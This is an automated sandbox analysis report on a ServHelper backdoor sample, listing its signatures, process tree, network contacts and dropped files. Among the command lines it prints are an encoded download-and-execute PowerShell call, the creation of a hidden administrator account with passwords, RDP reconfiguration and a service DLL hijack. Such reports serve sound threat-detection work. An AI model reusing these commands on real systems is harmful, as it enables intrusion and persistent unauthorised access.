Malware Analysis Report

2024-10-23 17:53

Sample ID 210902-tw1h5sage4
Target 472208d7ba18d4c14b7e90b9db5d6feb
SHA256 ae1c9d454905ed43654f99b1ea1e8ecc3ae08eb75c3860f46b285ce724ae5e4d
Tags
servhelper backdoor discovery exploit persistence trojan upx
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V6

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

ae1c9d454905ed43654f99b1ea1e8ecc3ae08eb75c3860f46b285ce724ae5e4d

Threat Level: Known bad

The file 472208d7ba18d4c14b7e90b9db5d6feb was found to be: Known bad.

Malicious Activity Summary

servhelper backdoor discovery exploit persistence trojan upx

ServHelper

Grants admin privileges

Blocklisted process makes network request

Sets DLL path for service in the registry

UPX packed file

Possible privilege escalation attempt

Modifies RDP port number used by Windows

Loads dropped DLL

Modifies file permissions

Drops file in System32 directory

Drops file in Windows directory

Drops file in Program Files directory

Script User-Agent

Suspicious use of AdjustPrivilegeToken

Runs net.exe

Suspicious behavior: LoadsDriver

Modifies registry key

Suspicious use of WriteProcessMemory

Suspicious behavior: EnumeratesProcesses

Modifies data under HKEY_USERS

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2021-09-02 16:25

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2021-09-02 16:25

Reported

2021-09-02 16:55

Platform

win7-en

Max time kernel

1750s

Max time network

1772s

Command Line

"C:\Users\Admin\AppData\Local\Temp\472208d7ba18d4c14b7e90b9db5d6feb.exe"

Signatures

ServHelper

trojan backdoor servhelper

Grants admin privileges

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Modifies RDP port number used by Windows

Possible privilege escalation attempt

exploit
Description Indicator Process Target
N/A N/A C:\Windows\system32\icacls.exe N/A
N/A N/A C:\Windows\system32\icacls.exe N/A
N/A N/A C:\Windows\system32\icacls.exe N/A
N/A N/A C:\Windows\system32\takeown.exe N/A
N/A N/A C:\Windows\system32\icacls.exe N/A
N/A N/A C:\Windows\system32\icacls.exe N/A
N/A N/A C:\Windows\system32\icacls.exe N/A
N/A N/A C:\Windows\system32\icacls.exe N/A

Sets DLL path for service in the registry

persistence

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Drops file in System32 directory

Description Indicator Process Target
File created C:\Windows\system32\rfxvmt.dll C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Drops file in Windows directory

Description Indicator Process Target
File created C:\Windows\branding\wupsvc.jpg C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\branding\ShellBrd C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\branding\wupsvc.jpg C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File created C:\Windows\branding\mediasvc.png C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\branding\Basebrd C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\branding\mediasrv.png C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\branding\mediasvc.png C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File created C:\Windows\ServiceProfiles\NetworkService\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\KB6Y95K1TRVJZ3LP0BBS.temp C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File created C:\Windows\branding\mediasrv.png C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Modifies data under HKEY_USERS

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ C:\Windows\System32\Wbem\WMIC.exe N/A
Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ C:\Windows\System32\Wbem\WMIC.exe N/A
Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Explorer\StartPage\StartMenu_Start_Time = b0a4dfb417a0d701 C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Modifies registry key

Description Indicator Process Target
N/A N/A C:\Windows\system32\reg.exe N/A

Runs net.exe

Suspicious behavior: LoadsDriver

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\472208d7ba18d4c14b7e90b9db5d6feb.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\icacls.exe N/A
Token: SeAssignPrimaryTokenPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeAuditPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeAssignPrimaryTokenPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeAuditPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeAssignPrimaryTokenPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeAuditPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeAssignPrimaryTokenPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeAuditPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1996 wrote to memory of 588 N/A C:\Users\Admin\AppData\Local\Temp\472208d7ba18d4c14b7e90b9db5d6feb.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1996 wrote to memory of 588 N/A C:\Users\Admin\AppData\Local\Temp\472208d7ba18d4c14b7e90b9db5d6feb.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1996 wrote to memory of 588 N/A C:\Users\Admin\AppData\Local\Temp\472208d7ba18d4c14b7e90b9db5d6feb.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 588 wrote to memory of 1056 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe
PID 588 wrote to memory of 1056 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe
PID 588 wrote to memory of 1056 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe
PID 1056 wrote to memory of 936 N/A C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe
PID 1056 wrote to memory of 936 N/A C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe
PID 1056 wrote to memory of 936 N/A C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe
PID 588 wrote to memory of 560 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 588 wrote to memory of 560 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 588 wrote to memory of 560 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 588 wrote to memory of 1160 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 588 wrote to memory of 1160 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 588 wrote to memory of 1160 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 588 wrote to memory of 792 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 588 wrote to memory of 792 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 588 wrote to memory of 792 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 588 wrote to memory of 1584 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\takeown.exe
PID 588 wrote to memory of 1584 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\takeown.exe
PID 588 wrote to memory of 1584 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\takeown.exe
PID 588 wrote to memory of 1676 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\icacls.exe
PID 588 wrote to memory of 1676 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\icacls.exe
PID 588 wrote to memory of 1676 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\icacls.exe
PID 588 wrote to memory of 1964 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\icacls.exe
PID 588 wrote to memory of 1964 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\icacls.exe
PID 588 wrote to memory of 1964 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\icacls.exe
PID 588 wrote to memory of 1396 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\icacls.exe
PID 588 wrote to memory of 1396 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\icacls.exe
PID 588 wrote to memory of 1396 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\icacls.exe
PID 588 wrote to memory of 844 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\icacls.exe
PID 588 wrote to memory of 844 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\icacls.exe
PID 588 wrote to memory of 844 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\icacls.exe
PID 588 wrote to memory of 1352 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\icacls.exe
PID 588 wrote to memory of 1352 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\icacls.exe
PID 588 wrote to memory of 1352 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\icacls.exe
PID 588 wrote to memory of 1324 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\icacls.exe
PID 588 wrote to memory of 1324 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\icacls.exe
PID 588 wrote to memory of 1324 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\icacls.exe
PID 588 wrote to memory of 320 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\icacls.exe
PID 588 wrote to memory of 320 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\icacls.exe
PID 588 wrote to memory of 320 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\icacls.exe
PID 588 wrote to memory of 1516 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\reg.exe
PID 588 wrote to memory of 1516 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\reg.exe
PID 588 wrote to memory of 1516 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\reg.exe
PID 588 wrote to memory of 1636 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\reg.exe
PID 588 wrote to memory of 1636 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\reg.exe
PID 588 wrote to memory of 1636 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\reg.exe
PID 588 wrote to memory of 1600 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\reg.exe
PID 588 wrote to memory of 1600 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\reg.exe
PID 588 wrote to memory of 1600 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\reg.exe
PID 588 wrote to memory of 1812 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\net.exe
PID 588 wrote to memory of 1812 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\net.exe
PID 588 wrote to memory of 1812 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\net.exe
PID 1812 wrote to memory of 936 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 1812 wrote to memory of 936 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 1812 wrote to memory of 936 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 588 wrote to memory of 1580 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\cmd.exe
PID 588 wrote to memory of 1580 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\cmd.exe
PID 588 wrote to memory of 1580 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\cmd.exe
PID 1580 wrote to memory of 1192 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 1580 wrote to memory of 1192 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 1580 wrote to memory of 1192 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 1192 wrote to memory of 1684 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\net.exe

Processes

C:\Users\Admin\AppData\Local\Temp\472208d7ba18d4c14b7e90b9db5d6feb.exe

"C:\Users\Admin\AppData\Local\Temp\472208d7ba18d4c14b7e90b9db5d6feb.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" -ep bypass & 'C:\Users\Admin\AppData\Local\Temp\\ready.ps1'

C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe

"C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\zzulzwbo.cmdline"

C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe

C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES1047.tmp" "c:\Users\Admin\AppData\Local\Temp\CSC1046.tmp"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -s -NoLogo -NoProfile

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -s -NoLogo -NoProfile

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -s -NoLogo -NoProfile

C:\Windows\system32\takeown.exe

"C:\Windows\system32\takeown.exe" /A /F rfxvmt.dll

C:\Windows\system32\icacls.exe

"C:\Windows\system32\icacls.exe" rfxvmt.dll /inheritance:d

C:\Windows\system32\icacls.exe

"C:\Windows\system32\icacls.exe" rfxvmt.dll /setowner "NT SERVICE\TrustedInstaller"

C:\Windows\system32\icacls.exe

"C:\Windows\system32\icacls.exe" rfxvmt.dll /grant "NT SERVICE\TrustedInstaller:F"

C:\Windows\system32\icacls.exe

"C:\Windows\system32\icacls.exe" rfxvmt.dll /remove "NT AUTHORITY\SYSTEM"

C:\Windows\system32\icacls.exe

"C:\Windows\system32\icacls.exe" rfxvmt.dll /grant "NT AUTHORITY\SYSTEM:RX"

C:\Windows\system32\icacls.exe

"C:\Windows\system32\icacls.exe" rfxvmt.dll /remove BUILTIN\Administrators

C:\Windows\system32\icacls.exe

"C:\Windows\system32\icacls.exe" rfxvmt.dll /grant BUILTIN\Administrators:RX

C:\Windows\system32\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 0x1C21 /f

C:\Windows\system32\reg.exe

"C:\Windows\system32\reg.exe" add HKLM\system\currentcontrolset\services\TermService\parameters /v ServiceDLL /t REG_EXPAND_SZ /d C:\Windows\branding\mediasrv.png /f

C:\Windows\system32\reg.exe

"C:\Windows\system32\reg.exe" add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /v fEnableWddmDriver /t reg_dword /d 0 /f

C:\Windows\system32\net.exe

"C:\Windows\system32\net.exe" localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add

C:\Windows\system32\cmd.exe

"C:\Windows\system32\cmd.exe" /c cmd /c net start rdpdr

C:\Windows\system32\cmd.exe

cmd /c net start rdpdr

C:\Windows\system32\net.exe

net start rdpdr

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 start rdpdr

C:\Windows\system32\cmd.exe

"C:\Windows\system32\cmd.exe" /c cmd /c net start TermService

C:\Windows\system32\cmd.exe

cmd /c net start TermService

C:\Windows\system32\net.exe

net start TermService

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 start TermService

C:\Windows\System32\cmd.exe

cmd /C net.exe user WgaUtilAcc 000000 /del

C:\Windows\system32\net.exe

net.exe user WgaUtilAcc 000000 /del

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 user WgaUtilAcc 000000 /del

C:\Windows\System32\cmd.exe

cmd /C net.exe user WgaUtilAcc iBs6lfst /add

C:\Windows\system32\net.exe

net.exe user WgaUtilAcc iBs6lfst /add

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 user WgaUtilAcc iBs6lfst /add

C:\Windows\System32\cmd.exe

cmd /C net.exe LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD

C:\Windows\system32\net.exe

net.exe LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD

C:\Windows\System32\cmd.exe

cmd /C net.exe LOCALGROUP "Remote Desktop Users" KJUCCLUP$ /ADD

C:\Windows\system32\net.exe

net.exe LOCALGROUP "Remote Desktop Users" KJUCCLUP$ /ADD

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" KJUCCLUP$ /ADD

C:\Windows\System32\cmd.exe

cmd /C net.exe LOCALGROUP "Administrators" WgaUtilAcc /ADD

C:\Windows\system32\net.exe

net.exe LOCALGROUP "Administrators" WgaUtilAcc /ADD

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 LOCALGROUP "Administrators" WgaUtilAcc /ADD

C:\Windows\System32\cmd.exe

cmd /C net.exe user WgaUtilAcc iBs6lfst

C:\Windows\system32\net.exe

net.exe user WgaUtilAcc iBs6lfst

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 user WgaUtilAcc iBs6lfst

C:\Windows\System32\cmd.exe

cmd.exe /C wmic path win32_VideoController get name

C:\Windows\System32\Wbem\WMIC.exe

wmic path win32_VideoController get name

C:\Windows\System32\cmd.exe

cmd.exe /C wmic CPU get NAME

C:\Windows\System32\Wbem\WMIC.exe

wmic CPU get NAME

C:\Windows\System32\cmd.exe

cmd.exe /C cmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA

C:\Windows\system32\cmd.exe

cmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA

C:\Windows\system32\cmd.exe

"C:\Windows\system32\cmd.exe" /c del %temp%\*.ps1 /f

C:\Windows\system32\cmd.exe

"C:\Windows\system32\cmd.exe" /c del %temp%\*.txt /f

C:\Windows\System32\cmd.exe

cmd.exe /C net user wgautilacc 111213&net user wgautilacc /active:yes

C:\Windows\system32\net.exe

net user wgautilacc 111213

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 user wgautilacc 111213

C:\Windows\system32\net.exe

net user wgautilacc /active:yes

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 user wgautilacc /active:yes

Network

Country Destination Domain Proto
N/A 69.195.124.227:80 tcp
N/A 8.8.8.8:53 2no.co udp
N/A 88.99.66.31:443 2no.co tcp
N/A 8.8.8.8:53 raw.githubusercontent.com udp
N/A 185.199.108.133:443 raw.githubusercontent.com tcp
N/A 185.199.108.133:443 raw.githubusercontent.com tcp
N/A 8.8.8.8:53 hitnaiguat.xyz udp
N/A 8.8.8.8:53 whereihjeu3.xyz udp
N/A 8.8.8.8:53 sagiai3agar.cn udp
N/A 8.8.8.8:53 sagiai3agar.cn udp
N/A 5.181.156.4:443 sagiai3agar.cn tcp
N/A 8.8.8.8:53 sagiai3agar.cn udp
N/A 8.8.8.8:53 sagiai3agar.cn udp
N/A 5.181.156.4:443 sagiai3agar.cn tcp
N/A 8.8.8.8:53 sagiai3agar.cn udp
N/A 8.8.8.8:53 sagiai3agar.cn udp
N/A 5.181.156.4:443 sagiai3agar.cn tcp
N/A 8.8.8.8:53 sagiai3agar.cn udp
N/A 8.8.8.8:53 sagiai3agar.cn udp
N/A 5.181.156.4:443 sagiai3agar.cn tcp
N/A 8.8.8.8:53 sagiai3agar.cn udp
N/A 8.8.8.8:53 sagiai3agar.cn udp
N/A 5.181.156.4:443 sagiai3agar.cn tcp
N/A 8.8.8.8:53 sagiai3agar.cn udp
N/A 8.8.8.8:53 sagiai3agar.cn udp
N/A 5.181.156.4:443 sagiai3agar.cn tcp
N/A 8.8.8.8:53 sagiai3agar.cn udp
N/A 8.8.8.8:53 sagiai3agar.cn udp
N/A 5.181.156.4:443 sagiai3agar.cn tcp
N/A 8.8.8.8:53 sagiai3agar.cn udp
N/A 8.8.8.8:53 sagiai3agar.cn udp
N/A 5.181.156.4:443 sagiai3agar.cn tcp

Files

memory/1996-52-0x0000000041650000-0x0000000041A70000-memory.dmp

memory/1996-55-0x00000000411B4000-0x00000000411B6000-memory.dmp

memory/1996-54-0x00000000411B2000-0x00000000411B4000-memory.dmp

memory/1996-56-0x00000000411B6000-0x00000000411B7000-memory.dmp

memory/1996-57-0x00000000411B7000-0x00000000411B8000-memory.dmp

memory/588-58-0x0000000000000000-mapping.dmp

memory/588-59-0x000007FEFBBC1000-0x000007FEFBBC3000-memory.dmp

memory/588-60-0x000007FEEB060000-0x000007FEEBBBD000-memory.dmp

memory/588-61-0x00000000023F0000-0x00000000023F2000-memory.dmp

memory/588-62-0x00000000023F2000-0x00000000023F4000-memory.dmp

memory/588-63-0x00000000023F4000-0x00000000023F7000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\ready.ps1

MD5 3447df88de7128bdc34942334b2fab98
SHA1 519be4e532fc53a7b8fe2ae21c9b7e35f923d3bb
SHA256 9520067abc34ce8a4b7931256e4ca15f889ef61750ca8042f60f826cb6cb2ac9
SHA512 2ccf6c187c3e17918daadd1fc7ca6e7dfaf6b958468a9867cca233e3506906164dfeb6104c8324e09d3058b090eab22417695b001ddb84f3d98562aec05eb78f

memory/1056-65-0x0000000000000000-mapping.dmp

\??\c:\Users\Admin\AppData\Local\Temp\zzulzwbo.cmdline

MD5 4f15d7369bef139b87503b52293f6cfd
SHA1 e9d94c6b9a2d5bfa098e634942aab3280a3a6b68
SHA256 8b3a6bd136a7d060633dfc4710848b91372a526293ae3a62e2d22bec42203538
SHA512 6fb2b764f35b1d0aaa2c93af056536802fa4c1f2a3dcdefe6886948e8141edf66a54b28151dfb7ebb15965ecc1d6be98110c217ae836d654a18656d0546f5a13

memory/588-67-0x00000000023FB000-0x000000000241A000-memory.dmp

\??\c:\Users\Admin\AppData\Local\Temp\zzulzwbo.0.cs

MD5 4864fc038c0b4d61f508d402317c6e9a
SHA1 72171db3eea76ecff3f7f173b0de0d277b0fede7
SHA256 0f5273b8fce9bfd95677be80b808119c048086f8e17b2e9f9964ae8971bd5a84
